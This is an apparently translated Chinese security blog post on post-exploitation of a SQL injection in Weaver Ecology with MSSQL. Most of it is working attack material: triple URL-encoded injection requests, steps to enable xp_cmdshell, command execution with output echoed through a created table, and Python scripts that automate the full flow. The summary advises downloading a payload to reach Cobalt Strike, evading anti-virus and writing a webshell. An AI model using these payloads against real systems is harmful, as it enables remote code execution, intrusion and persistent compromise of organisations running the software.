Weaver (泛微) Ecology MSSQL Injection: Post-Exploitation

admin · 2023-08-03 09:58:59 · 65 views · 7083 characters · 23 min read

0x00 Preface

In March, a SQL injection vulnerability in a certain Weaver product was disclosed online; the community has already analysed the vulnerability itself in detail.

This article records the post-exploitation techniques that were verified while reproducing the vulnerability.



0x01 Vulnerability verification

Use the public POC to confirm that the vulnerability is present and, while at it, identify the database version.



The injection statement has to be triple URL-encoded to get past the keyword filter.

a' union select 1,''+(SELECT @@VERSION)+'
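As an added example (Python, not code from the original post), the script below reproduces the triple URL-encoding the payloads on this page use, decodes the encoded requests shown in the later sections back to SQL, and assembles the isDis=1&browserTypeId=269&keyword=... query string in the shape the page shows. The endpoint path is not given on the page, so only the query string is built; the function and parameter names (encode_all, triple_encode, raw_segments and so on) are the script's own, and the UNSAFE_RAW check is an added guard, not something the page states.

```python
import re
from urllib.parse import unquote

# Characters the web server's own query-string decoder would alter on the first
# decode; a segment containing any of these cannot be passed through raw.
UNSAFE_RAW = set("%&+# ")


def encode_all(s: str) -> str:
    """Percent-encode every byte of s with lowercase hex, reserved or not.

    The page's payloads encode letters and spaces as well (e.g. 'L' -> '%4c'),
    which is what keeps SQL keywords out of the raw parameter value.
    """
    return "".join("%%%02x" % b for b in s.encode("utf-8"))


def triple_encode(payload: str, raw_segments=()) -> str:
    """Apply encode_all three times, leaving raw_segments (e.g. the table name)
    as literal text, exactly as the page's encoded requests do."""
    for seg in raw_segments:
        if set(seg) & UNSAFE_RAW:
            raise ValueError(f"raw segment {seg!r} contains characters that must be encoded")
    if raw_segments:
        # Capturing group keeps the raw segments in the split result.
        splitter = "(" + "|".join(re.escape(s) for s in raw_segments) + ")"
        pieces = re.split(splitter, payload)
    else:
        pieces = [payload]
    out = []
    for piece in pieces:
        if piece in raw_segments:
            out.append(piece)
            continue
        for _ in range(3):
            piece = encode_all(piece)
        out.append(piece)
    return "".join(out)


def triple_decode(value: str) -> str:
    """Reverse triple_encode: undo three layers of percent-encoding.
    Raw segments contain no '%' and pass through every layer unchanged."""
    for _ in range(3):
        value = unquote(value)
    return value


def build_query(keyword_sql: str, raw_segments=()) -> str:
    """Assemble the query string in the form the page shows
    (isDis=1&browserTypeId=269&keyword=<triple-encoded SQL>)."""
    return "isDis=1&browserTypeId=269&keyword=" + triple_encode(keyword_sql, raw_segments)


def keyword_sql_from_query(query: str) -> str:
    """Extract the keyword parameter from a query string and decode it back to
    SQL, to check what a captured request would actually execute."""
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name == "keyword":
            return triple_decode(value)
    raise ValueError("no keyword parameter")


if __name__ == "__main__":
    stmt = ("x'CREATE TABLE ecology.dbo.temp_abcd"
            "(id INT PRIMARY KEY IDENTITY, data VARCHAR(2100)) select'")
    q = build_query(stmt, raw_segments=("ecology.dbo.temp_abcd",))
    print(q)
    print(keyword_sql_from_query(q))
```

Running it prints the same encoded form as the page's step-1 request (the table name left in clear, everything else as %25%32%35... units) followed by the decoded statement. Raw segments are only safe when they contain nothing the server decodes on its own; a plus sign, for instance, would be turned into a space on the first decode, which is why the page encodes the trailing +' of the UNION payload.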




The original author's blog post mentions one particular detail (shown in a screenshot in the original post), and I ran some tests based on it.



0x02 Exploitation with outbound network access

Start by testing with a ping command.



These are the familiar statements; there were just a few small pitfalls during testing, all of which I have already stepped on.

POC (before encoding), one request per line; each keyword value is sent as its own request, and the trailing select' turns the application's own closing %' into a harmless select '%' statement:

keyword='EXEC sp_configure 'show advanced options',1 select'
keyword='RECONFIGURE select'
keyword='EXEC sp_configure 'xp_cmdshell',1 select'
keyword='RECONFIGURE select'
keyword='exec master..xp_cmdshell 'ping dnslog.cn' select'

If the host has outbound access, just download a payload remotely, execute it, and it checks in to CS (Cobalt Strike); from there it is point and click.



0x03 Exploitation without outbound access (echoing results)

1. Create a table temp_abcd. Despite the name it is a regular table in the ecology database, not a #temp table, which is why step 4 has to drop it. The unencoded injection statement:

keyword=x'CREATE TABLE ecology.dbo.temp_abcd(id INT PRIMARY KEY IDENTITY, data VARCHAR(2100)) select'


Parts that contain no special characters (here the table name) can be left unencoded:

isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%31%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%33%31%25%32%35%25%33%34%25%33%32%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%32%25%33%30ecology.dbo.temp_abcd%25%32%35%25%33%32%25%33%38%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%35%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%30%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%34%25%32%35%25%33%34%25%33%31%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%36%32%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%33%34%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%35%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%33%39%25%32%35%25%33%35%25%33%34%25%32%35%25%33%35%25%33%39%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%31%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%33%33%25%32%35%25%33%34%25%33%38%25%32%35%25%33%34%25%33%31%25%32%35%25%33%35%25%33%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%33%25%33%32%25%32%35%25%33%33%25%33%31%25%32%35%25%33%33%25%33%30%25%32%35%25%33%33%25%33%30%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%37


2. Run the command and write its output into the table. The unencoded statement below runs chdir; the encoded request that follows runs whoami instead.

keyword=x'INSERT INTO ecology.dbo.temp_abcd(data) EXEC master..xp_cmdshell 'chdir' select'




isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%35%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%35%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%36%36%25%32%35%25%33%32%25%33%30ecology.dbo.temp_abcd%25%32%35%25%33%32%25%33%38%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%38%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%36%35%25%32%35%25%33%32%25%36%35%25%32%35%25%33%37%25%33%38%25%32%35%25%33%37%25%33%30%25%32%35%25%33%35%25%36%36%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%34%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%33%25%32%35%25%33%32%25%33%30%25%32%35%25%33%32%25%33%37whoami%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%37



3. Read the command output back out of the table

Every line that xp_cmdshell produces becomes one row, and the IDENTITY column keeps counting across commands, so running further commands appends more rows. Change the id to reach the rows you want (id=2, id=3, ...).

keyword=x'UNION SELECT 1,(select data from ecology.dbo.temp_abcd where id=1)+'




isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%35%25%33%35%25%32%35%25%33%34%25%36%35%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30ecology.dbo.temp_abcd%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30id=1%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37



4. Clean up: drop the table

keyword=x'DROP TABLE ecology.dbo.temp_abcd select'




isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%37%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%34%25%33%34%25%32%35%25%33%35%25%33%32%25%32%35%25%33%34%25%36%36%25%32%35%25%33%35%25%33%30%25%32%35%25%33%32%25%33%30%25%32%35%25%33%35%25%33%34%25%32%35%25%33%34%25%33%31%25%32%35%25%33%34%25%33%32%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%32%25%33%30ecology.dbo.temp_abcd%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%37



Comparison of the SQL actually executed (with keyword = x'UNION SELECT ...) against the application's original statement:

select t1.id as id,t1.name as name from ecology.dbo.meeting_remind_type t1 where isuse=1 and t1.name like '%keyword%'
select t1.id as id,t1.name as name from ecology.dbo.meeting_remind_type t1 where isuse=1 and t1.name like '%x'UNION SELECT 1,(select data from ecology.dbo.temp_abcd where id=1)+'%'

The leading x' closes the LIKE pattern, and the trailing +' concatenates the application's own closing %' onto the subquery result, so the statement stays balanced without a comment sequence. The subquery's value is returned in the name column, which the endpoint renders, and that is the echo channel. Note that NULL + '%' is NULL in T-SQL, so a row whose data is NULL (xp_cmdshell stores blank output lines that way) echoes nothing even though the row exists.
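The four steps above as one runnable flow, as an added example (Python, not code from the original post). It builds the page's payloads unchanged and adds one thing the page does not have: a MAX(id) read before and after each command, so the rows that belong to that command are known and fetched by id, which is the iteration the summary below describes. The FakeTarget class is a constructed stand-in for the vulnerable endpoint so the script runs offline; it is not the real product, and its canned command output (the whoami and chdir results) is invented for the demo.

```python
import re

TABLE = "ecology.dbo.temp_abcd"  # the table name used on the page


def create_payload() -> str:
    return f"x'CREATE TABLE {TABLE}(id INT PRIMARY KEY IDENTITY, data VARCHAR(2100)) select'"


def insert_payload(cmd: str) -> str:
    # A single quote inside the command would end the T-SQL string literal; double it.
    safe = cmd.replace("'", "''")
    return f"x'INSERT INTO {TABLE}(data) EXEC master..xp_cmdshell '{safe}' select'"


def read_payload(row_id: int) -> str:
    return f"x'UNION SELECT 1,(select data from {TABLE} where id={row_id})+'"


def max_id_payload() -> str:
    # Added step, not on the page: read MAX(id) so the id range of the latest
    # command is known instead of guessing id=2, id=3, ...
    return f"x'UNION SELECT 1,(select cast(max(id) as varchar(10)) from {TABLE})+'"


def drop_payload() -> str:
    return f"x'DROP TABLE {TABLE} select'"


def max_id(send) -> int:
    echo = send(max_id_payload())
    return int(echo[0]) if echo else 0  # empty table: MAX(id) is NULL, nothing echoes


def run_command(send, cmd: str) -> list:
    """Run cmd through the echo channel and return its output lines.

    send(keyword) must return the list of name values the endpoint echoes.
    xp_cmdshell stores blank output lines as NULL rows and NULL + '%' is NULL,
    so those ids echo nothing; every id in the new range is therefore read and
    an empty echo is kept as an empty line rather than treated as end of output.
    """
    before = max_id(send)
    send(insert_payload(cmd))
    after = max_id(send)
    lines = []
    for row_id in range(before + 1, after + 1):
        echo = send(read_payload(row_id))
        lines.append(echo[0] if echo else "")
    return lines


class FakeTarget:
    """Constructed stand-in for the vulnerable endpoint so the flow runs offline.

    It recognises the payload shapes above and mimics an IDENTITY table plus
    xp_cmdshell with canned output, including the trailing NULL row xp_cmdshell
    emits. It is not the real product and parses nothing else.
    """
    CANNED = {
        "whoami": ["nt service\\mssqlserver", None],
        "chdir": ["C:\\Windows\\system32", None],
    }

    def __init__(self):
        self.rows = None  # None until the table has been created

    def send(self, keyword: str) -> list:
        if keyword.startswith("x'CREATE TABLE "):
            self.rows = []
            return []
        if keyword.startswith("x'DROP TABLE "):
            self.rows = None
            return []
        if self.rows is None:
            raise RuntimeError("Invalid object name: table not created")
        m = re.fullmatch(r"x'INSERT INTO \S+\(data\) EXEC master\.\.xp_cmdshell '(.*)' select'", keyword)
        if m:
            cmd = m.group(1).replace("''", "'")
            fallback = [f"'{cmd}' is not recognized as an internal or external command,", None]
            self.rows.extend(self.CANNED.get(cmd, fallback))
            return []
        m = re.fullmatch(r"x'UNION SELECT 1,\(select data from \S+ where id=(\d+)\)\+'", keyword)
        if m:
            i = int(m.group(1))
            value = self.rows[i - 1] if 0 < i <= len(self.rows) else None
            return [] if value is None else [value]  # NULL + '%' is NULL: no echo
        if "max(id)" in keyword:
            return [str(len(self.rows))] if self.rows else []
        raise ValueError("unrecognised payload: " + keyword)


if __name__ == "__main__":
    target = FakeTarget()
    target.send(create_payload())
    for cmd in ("whoami", "chdir"):
        print(cmd, "->", run_command(target.send, cmd))
    target.send(drop_payload())
```

Against a real target, send would triple-encode the keyword as the page shows and return the name values parsed from the response; nothing else changes. Reading only the ids above the recorded high-water mark means output from earlier commands never mixes into the current one, and the loop over a known range is what a Burp Intruder run over id would otherwise do by hand.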




0x04 Summary

  1. In a real engagement, find out what anti-virus is present before deciding on the next step.

  2. Without outbound access, if you need to write a webshell, first check whether the web server and the database run on separate hosts.

  3. When a command's output spans several lines, iterate over id to collect the complete output.

  4. For large outputs, Burp's Intruder module can help with the iteration.

  5. During testing I found that cached data could still be read after the table was dropped (harmless, but be aware of it so it does not mislead you).



0x05 References

http://www.lvyyevd.cn/archives/mou-wei-sql-zhu-ru-fen-xi

https://mp.weixin.qq.com/s/17tc4ep83x4243lzr-brCg







Originally published on the WeChat public account 小黑说安全: 泛微Ecology Mssql注入后利用

Reposted by CN-SEC中文网 (keep this link when reprinting): https://cn-sec.com/archives/1930547.html
